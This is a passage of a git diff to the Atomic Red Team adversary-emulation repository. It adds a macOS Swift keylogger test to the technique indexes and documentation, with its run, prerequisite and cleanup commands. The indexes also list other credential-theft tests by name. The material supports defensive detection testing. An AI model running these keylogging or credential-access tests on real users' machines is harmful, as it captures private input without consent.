Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1fee90bc..cccc6afd 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -781,6 +781,7 @@ collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4 collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh +collection,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell 
@@ -835,6 +836,7 @@ credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh +credential-access,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 8d2df606..29aec657 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
@@ -66,6 +66,7 @@ collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash +collection,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash @@ -113,6 +114,7 @@ privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh privilege-escalation,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash +credential-access,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2d3c60cf..1058901e 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -1354,6 +1354,7 @@ - Atomic Test #4: Bash session based keylogger [linux] - Atomic Test #5: SSHD PAM keylogger [linux] - Atomic Test #6: Auditd keylogger [linux] + - Atomic Test #7: MacOS Swift Keylogger [macos] - T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1123 Audio Capture](../../T1123/T1123.md) @@ -1480,6 +1481,7 @@ - Atomic Test #4: Bash session based keylogger [linux] - Atomic Test #5: SSHD PAM keylogger [linux] - Atomic Test #6: Auditd keylogger [linux] + - Atomic Test #7: MacOS Swift Keylogger [macos] - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index c2277284..ad5c7133 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md 
@@ -165,7 +165,8 @@ - Atomic Test #1: Screencapture [macos] - Atomic Test #2: Screencapture (silent) [macos] - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) + - Atomic Test #7: MacOS Swift Keylogger [macos] - T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -365,7 +366,8 @@ # credential-access - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) + - Atomic Test #7: MacOS Swift Keylogger [macos] - T1110.001 Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index e09ae6cf..2d0d6cbe 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md 
@@ -3,8 +3,8 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
| Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2ee528db..b1609a0d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -63001,6 +63001,41 @@ collection: cleanup_command: 'systemctl restart auditd ' + - name: MacOS Swift Keylogger + auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 + description: | + Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. + Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. + Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 + supported_platforms: + - macos + input_arguments: + swift_src: + description: Location of swift script + type: Path + default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift + dependency_executor_name: bash + dependencies: + - description: 'swift script must exist at #{swift_src}, and the terminal must + have input monitoring permissions. + + ' + prereq_command: 'if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else + exit 1; fi + + ' + get_prereq_command: 'echo "" + + ' + executor: + command: 'swift #{swift_src} -keylog + + ' + cleanup_command: 'kill `pgrep swift-frontend` + + ' + name: bash + elevation_required: false T1602: technique: x_mitre_platforms: 
@@ -68989,6 +69024,41 @@ credential-access: cleanup_command: 'systemctl restart auditd ' + - name: MacOS Swift Keylogger + auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 + description: | + Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. + Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. + Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 + supported_platforms: + - macos + input_arguments: + swift_src: + description: Location of swift script + type: Path + default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift + dependency_executor_name: bash + dependencies: + - description: 'swift script must exist at #{swift_src}, and the terminal must + have input monitoring permissions. + + ' + prereq_command: 'if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else + exit 1; fi + + ' + get_prereq_command: 'echo "" + + ' + executor: + command: 'swift #{swift_src} -keylog + + ' + cleanup_command: 'kill `pgrep swift-frontend` + + ' + name: bash + elevation_required: false T1110.001: technique: x_mitre_platforms: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index cba8f1d1..1b0da811 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -24,6 +24,8 @@ Keylogging is the most prevalent type of input capture, with many different ways - [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger) +- [Atomic Test #7 - MacOS Swift Keylogger](#atomic-test-7---macos-swift-keylogger) +
@@ -323,4 +325,55 @@ echo "" +
+
+ +## Atomic Test #7 - MacOS Swift Keylogger +Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. +Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. +Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 + +**Supported Platforms:** macOS + + +**auto_generated_guid:** aee3a097-4c5c-4fff-bbd3-0a705867ae29 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| swift_src | Location of swift script | Path | PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift| + + +#### Attack Commands: Run with `bash`! + + +```bash +swift #{swift_src} -keylog +``` + +#### Cleanup Commands: +```bash +kill `pgrep swift-frontend` +``` + + + +#### Dependencies: Run with `bash`! +##### Description: swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions. +##### Check Prereq Commands: +```bash +if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi +``` +##### Get Prereq Commands: +```bash +echo "" +``` + + + +